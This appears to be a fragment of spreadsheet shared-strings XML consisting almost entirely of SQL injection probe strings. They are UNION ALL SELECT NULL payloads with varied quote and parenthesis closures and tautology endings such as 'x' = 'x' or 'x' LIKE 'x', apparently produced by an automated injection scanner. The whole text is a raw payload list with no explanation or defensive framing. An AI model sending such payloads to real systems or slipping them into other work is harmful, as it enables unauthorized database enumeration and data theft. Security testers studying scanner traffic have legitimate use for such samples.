    <t xml:space="preserve">  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 7958 = 7958</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</si>
  <si>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( 5804 = 5804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</si>
  <si>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( 1666 = 1666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</si>
  <si>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( 8209 = 8209</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</si>
  <si>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( 2565 = 2565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</si>
  <si>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( 6578 = 6578</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'luHr' = 'luHr</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'CdrF' = 'CdrF</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ybTp' = 'ybTp</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'eIGZ' = 'eIGZ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Rymi' = 'Rymi</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'vfdQ' = 'vfdQ</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'IMyz' = 'IMyz</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'ALvH' = 'ALvH</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Tqlv' = 'Tqlv</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</si>
  <si>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'FTHj' = 'FTHj</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'qqvs' = 'qqvs</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'USan' = 'USan</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'hfsv' = 'hfsv</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'bmGy' = 'bmGy</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'LJLk' = 'LJLk</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'fnoq' = 'fnoq</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'Osly' = 'Osly</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'gJcj' = 'gJcj</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</si>
  <si>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'Zqxe' = 'Zqxe</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</si>
  <si>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'Snlr' = 'Snlr</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'UjvT' = 'UjvT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'dVbG' = 'dVbG</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'AApL' = 'AApL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'zalx' = 'zalx</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'urXT' = 'urXT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'fPjH' = 'fPjH</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'ruWL' = 'ruWL</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'cfpO' = 'cfpO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</si>
  <si>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'Sabz' = 'Sabz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</si>
  <si>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'tHHA' = 'tHHA</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'eVYx' = 'eVYx</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'iVIW' = 'iVIW</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'pgSM' = 'pgSM</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'aYnu' = 'aYnu</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'xtvD' = 'xtvD</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'FhUa' = 'FhUa</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'vznt' = 'vznt</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'lqWk' = 'lqWk</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'hMbj' = 'hMbj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</si>
  <si>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'VZmx' = 'VZmx</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'Cjhs' LIKE 'Cjhs</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'GaUT' LIKE 'GaUT</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'DQMB' LIKE 'DQMB</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'tygW' LIKE 'tygW</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'upGG' LIKE 'upGG</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'fqkF' LIKE 'fqkF</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'YcIp' LIKE 'YcIp</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'WTZu' LIKE 'WTZu</t>
  </si>
  <si>
    <t>' )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND  ( 'hHzQ' LIKE 'hHzQ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</si>
  <si>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'aONm' LIKE 'aONm</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'wTnZ' LIKE 'wTnZ</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'YLTN' LIKE 'YLTN</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'hGAd' LIKE 'hGAd</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'NEjD' LIKE 'NEjD</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'QlAe' LIKE 'QlAe</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'sWnE' LIKE 'sWnE</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'FGpj' LIKE 'FGpj</t>
  </si>
  <si>
    <t>'  )  )   UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (  'giMZ' LIKE 'giMZ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</si>
  <si>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'AlEK' LIKE 'AlEK</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</si>
  <si>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'EnQs' LIKE 'EnQs</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'sfKR' LIKE 'sfKR</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'PmEW' LIKE 'PmEW</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'CJyJ' LIKE 'CJyJ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'aUHZ' LIKE 'aUHZ</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'wTSh' LIKE 'wTSh</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'EPYT' LIKE 'EPYT</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'yWDn' LIKE 'yWDn</t>
  </si>
  <si>
    <t>'  )  )   )  UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND   (  (   ( 'Mndr' LIKE 'Mndr</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</si>
  <si>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'wUhO' LIKE 'wUhO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</si>
  <si>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'gnTo' LIKE 'gnTo</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'dcWH' LIKE 'dcWH</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'QpIs' LIKE 'QpIs</t>
  </si>
  <si>
    <t>' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL# AND 'UKnx' LIKE 'UKnx</t>
  </si>
  <si>
